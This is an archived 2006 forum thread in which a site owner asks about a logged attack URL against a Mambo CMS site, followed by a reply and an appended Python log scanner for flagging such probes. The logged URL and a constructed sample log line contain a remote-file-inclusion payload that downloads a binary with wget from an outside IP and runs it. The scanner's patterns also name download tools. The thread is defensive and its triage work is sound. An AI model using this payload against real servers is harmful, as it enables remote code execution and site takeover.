draxion
Posted March 6, 2006

Hi, I'm wondering if anyone can help me out. I noticed the following in my web stats today and assumed it was just another attempt to try and hack my site. Here's the URL that was recorded:

http://66.49.232.190/index.php?option=com_...x2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://204.83.56.144/cmd.gif?&cmd=cd%20/tmp;wget%20204.83.56.144/gicupo;chmod%20744%20gicupo;./gicup

I've gotten a few of these in the past and have simply denied access to the IPs. They never seem to appear again. But this time, about an hour later, I noticed someone logged on using an old test account that I created a few months back. They logged on for about 8 minutes and then logged off using my logoff.php page. Strange. The originating IP address is not the same, but both IP addresses are from the same ISP: MCI.

I'm wondering what happened. Did someone get a hold of my accounts and passwords? How did this happen? Anyone have any ideas?

Thanks
Shayne

kgt
Posted March 6, 2006

This URL looks like a Mambo URL, and lo and behold:

http://forum.mamboserver.com/showthread.php?t=73285

Unless you're running Mambo, this isn't an issue. It looks like someone might be indiscriminately hitting PHP sites.
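
For triaging requests like the one quoted in the first post, the following is an added example (not from the thread or from Mambo) of a log check that flags parameters naming PHP superglobals, parameters whose value is a remote URL, and parameters carrying shell commands. The log lines and addresses are constructed, and the function names `inspect_request` and `scan_log` are hypothetical.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# PHP superglobals that a request should never name as a parameter.
SUPERGLOBAL = re.compile(
    r"^(GLOBALS|_(REQUEST|GET|POST|COOKIE|SERVER|ENV|FILES|SESSION))(\[|$)")
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.I)
SHELL_WORD = re.compile(r"(^|[;|&\s])(wget|curl|chmod)\s", re.I)
# Access-log prefix: client, identity, user, [time], "METHOD target ..." status
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')

# Constructed sample lines (documentation addresses, not taken from the thread).
SAMPLE_LOG = [
    '198.51.100.23 - - [06/Mar/2006:10:12:01 -0500] '
    '"GET /index.php?option=com_content&task=view&id=5 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Mar/2006:10:14:37 -0500] '
    '"GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS='
    '&mosConfig_absolute_path=http://192.0.2.66/cmd.gif?'
    '&cmd=cd%20/tmp;wget%20192.0.2.66/x;chmod%20744%20x HTTP/1.0" 200 312',
]


def inspect_request(target):
    """Return sorted reasons why a request target looks like an inclusion probe."""
    reasons = set()
    # Heuristic: split on '?' as well as '&', because the injected include
    # URL brings its own '?' and would otherwise hide the parameters after it.
    for pair in re.split(r"[&?]", urlsplit(target).query):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        name, value = unquote_plus(name), unquote_plus(value)
        if SUPERGLOBAL.match(name):
            reasons.add("superglobal-override:" + name)
        if REMOTE_URL.match(value):
            reasons.add("remote-url-in-param:" + name)
        if SHELL_WORD.search(value):
            reasons.add("shell-command-in-param:" + name)
    return sorted(reasons)


def scan_log(lines):
    """Return (client_ip, status, reasons) for every flagged log line."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        reasons = inspect_request(m.group(2)) if m else []
        if reasons:
            hits.append((m.group(1), m.group(3), reasons))
    return hits


if __name__ == "__main__":
    for ip, status, reasons in scan_log(SAMPLE_LOG):
        print(ip, status, ", ".join(reasons))
```

The status code is returned with each hit so flagged requests can be compared against what the server actually answered.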
Archived
This topic is now archived and is closed to further replies.